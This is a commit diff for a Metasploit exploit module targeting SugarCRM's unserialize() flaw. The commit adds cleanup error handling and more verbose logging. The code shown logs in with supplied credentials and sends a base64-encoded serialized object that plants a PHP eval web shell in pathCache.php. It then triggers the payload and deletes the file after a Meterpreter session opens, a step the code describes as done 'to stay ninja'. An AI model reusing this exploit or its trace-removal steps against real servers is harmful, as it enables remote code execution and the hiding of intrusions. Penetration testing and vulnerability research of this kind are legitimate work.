Make it more verbose, and do some exception handling for cleanup

rapid7 · Jun 25, 2012 · 8927c8a · 8927c8a
1 parent fef77bf
commit 8927c8a
Showing 1 changed file with 16 additions and 10 deletions.
diff --git a/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb b/modules/exploits/unix/webapp/sugarcrm_unserialize_exec.rb
@@ -62,20 +62,26 @@ def initialize(info = {})
 
 	def on_new_session(client)
 		if client.type == "meterpreter"
+			f = "pathCache.php"
 			client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
-			client.fs.file.rm("pathCache.php")
+			begin
+				client.fs.file.rm(f)
+				print_good("#{@peer} - #{f} removed to stay ninja")
+			rescue
+				print_error("#{@peer} - Unable to remove #{f}")
+			end
 		end
 	end
 
 	def exploit
-
 		base = target_uri.path
 		base << '/' if base[-1, 1] != '/'
 
-		peer = "#{rhost}:#{rport}"
+		@peer = "#{rhost}:#{rport}"
 		username = datastore['USERNAME']
 		password = datastore['PASSWORD']
 
+		# Can't use vars_post because it'll escape "_"
 		data = "module=Users&"
 		data << "action=Authenticate&"
 		data << "user_name=#{username}&"
@@ -93,26 +99,26 @@ def exploit
 		})
 
 		if not res or res.headers['Location'] =~ /action=Login/ or not res.headers['Set-Cookie']
-			print_error("#{peer} - Login failed with \"#{username}:#{password}\"")
+			print_error("#{@peer} - Login failed with \"#{username}:#{password}\"")
 			return
 		end
 
 		if res.headers['Set-Cookie'] =~ /PHPSESSID=([A-Za-z0-9]*); path/
 			session_id = $1
 		else
-			print_error("#{peer} - Login failed with \"#{username}:#{password}\"")
+			print_error("#{@peer} - Login failed with \"#{username}:#{password}\" (No session ID)")
 			return
 		end
 
-		print_status("#{peer} - Login successful with #{username}:#{password}")
+		print_status("#{@peer} - Login successful with #{username}:#{password}")
 
 		data = "module=Contacts&"
 		data << "Contacts2_CONTACT_offset=1&"
 		data << "current_query_by_page="
 		#O:10:"SugarTheme":2:{s:10:"*dirName";s:5:"../..";s:20:"SugarTheme_jsCache";s:49:"<?php eval(base64_decode($_SERVER[HTTP_CMD])); ?>";}
 		data << "TzoxMDoiU3VnYXJUaGVtZSI6Mjp7czoxMDoiACoAZGlyTmFtZSI7czo1OiIuLi8uLiI7czoyMDoiAFN1Z2FyVGhlbWUAX2pzQ2FjaGUiO3M6NDk6Ijw/cGhwIGV2YWwoYmFzZTY0X2RlY29kZSgkX1NFUlZFUltIVFRQX0NNRF0pKTsgPz4iO30="
 
-		print_status("#{peer} - Exploiting the unserialize()")
+		print_status("#{@peer} - Exploiting the unserialize()")
 
 		res = send_request_cgi(
 		{
@@ -126,11 +132,11 @@ def exploit
 		})
 
 		if not res or res.code != 200
-			print_error("#{peer} - Exploit failed")
+			print_error("#{@peer} - Exploit failed: #{res.code}")
 			return
 		end
 
-		print_status("#{peer} - Executing the payload")
+		print_status("#{@peer} - Executing the payload")
 
 		res = send_request_cgi(
 		{
@@ -142,7 +148,7 @@ def exploit
 		})
 
 		if res
-			print_error("#{peer} - Payload execution failed")
+			print_error("#{@peer} - Payload execution failed: #{res.code}")
 			return
 		end